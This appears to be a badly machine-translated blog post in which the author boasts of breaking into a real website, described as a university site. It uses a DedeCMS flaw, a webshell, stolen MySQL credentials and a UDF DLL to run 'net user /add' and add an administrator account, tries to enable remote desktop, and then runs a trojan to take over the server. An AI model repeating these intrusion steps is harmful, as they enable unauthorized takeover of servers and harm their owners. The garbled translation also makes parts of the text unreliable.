In the past few days, I have nothing to do, and I have won the SHELL some time ago to raise the right ..
I would like to give you a simple idea. The website won the game with the DEDE vulnerability. I have no permission to upload a PHP trojan in one sentence, and I have passed ASP or ASPX,
I tried to upload a PHP Privilege Escalation tool and connected to the mysql website. (the database information is included in the DEDE configuration file)
Execute the statement
Create function Using shell returns string soname udf. dll
Select foreign shell (net user username and password/add );
Select multiple shell (net localgroup administrators username/add );
The execution was successful, the server did not open 3389, And the CMD method was used to enable it. The prompt was successful, but the connection still failed ..
. Net user ..
Try to run a trojan directly to see if the trojan will go online ..
A bear-free Trojan is configured ..
Run the select statement shell (F: DedeAMPZxwzx1.exe );
OK! Won the server... Haha [this website is an Alibaba university website]